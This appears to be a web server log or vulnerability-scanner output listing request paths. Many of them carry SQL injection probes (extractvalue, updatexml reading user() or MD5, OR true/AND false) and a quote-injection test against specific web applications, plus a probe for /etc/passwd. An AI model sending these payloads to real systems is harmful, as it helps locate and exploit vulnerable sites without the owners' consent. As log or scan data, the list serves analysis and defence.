/web/Side.php
/web/homeaction.php
/web/main/inc/ajax/extra_field.ajax.php?a=search_options_from_tags
/web/auth/check
/web/ajax/api/content_infraction/getIndexableContent
/web/duomiphp/ajax.php?action=addfav&id=1&uid=1%20and%20extractvalue(1,concat_ws(1,1,md5(9999999999)))
/web/api/experimental/patternfile?order=id%3Bselect(md5('nuclei'))&page=0&page_size=0
/web/cgi-bin/supportInstaller
/web/auth/requestreset
/web/scrm/crm/admin
/web/
/web/action.php
/web/index.php?m=&c=AjaxPersonal&a=company_focus&company_id[0]=match&company_id[1][0]=test")
/web/api/sms_check.php?param=1%27%20and%20updatexml(1,concat(0x7e,(SELECT%20MD5(1234)),0x7e),1)--%20
/web/http/index.php
/web/user.php?act=login
/web/graphql
/web/cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/WebReferences
/web/dfsms/
/web/wp-content/plugins/wp-statistics/readme.txt
/web/account/index.php
/web/index.php?m=member&f=login_save
/web/
/web/module/ph_simpleblog/list?sb_category=')%20OR%20true--%20-
/web/jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,user()),0)::
/web/main/inc/ajax/extra_field.ajax.php?a=search_options_from_tags
/web/homeaction.php
/web/auth/check
/web/ajax/api/content_infraction/getIndexableContent
/web/duomiphp/ajax.php?action=addfav&id=1&uid=1%20and%20extractvalue(1,concat_ws(1,1,md5(9999999999)))
/web/api/experimental/patternfile?order=id%3Bselect(md5('nuclei'))&page=0&page_size=0
/web/cgi-bin/supportInstaller
/web/scrm/crm/admin
/web/action.php
/web/index.php?m=&c=AjaxPersonal&a=company_focus&company_id[0]=match&company_id[1][0]=test")
/web/api/sms_check.php?param=1%27%20and%20updatexml(1,concat(0x7e,(SELECT%20MD5(1234)),0x7e),1)--%20
/web/graphql
/web/wp-content/plugins/wp-statistics/readme.txt
/web/dfsms/
/web/auth/newpassword
/web/opensis/index.php
/web/wp-admin/admin-ajax.php
/web/'
/web/ebook/bookPerPub.php?pubid=4'
/web/main/inc/ajax/extra_field.ajax.php?a=search_options_from_tags
/web/?q=node&destination=node
/web/etc/passwd
/web/index.php
/web/index.php?m=member&f=login_save
/web/module/ph_simpleblog/list?sb_category=')%20OR%20true--%20-
/web/jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,user()),0)::
/web/module/ph_simpleblog/list?sb_category=')%20AND%20false--%20-
/web/'
/web/ebook/bookPerPub.php?pubid=4'
/web/main/inc/ajax/extra_field.ajax.php?a=search_options_from_tags
/web/module/ph_simpleblog/list?sb_category=')%20AND%20false--%20-
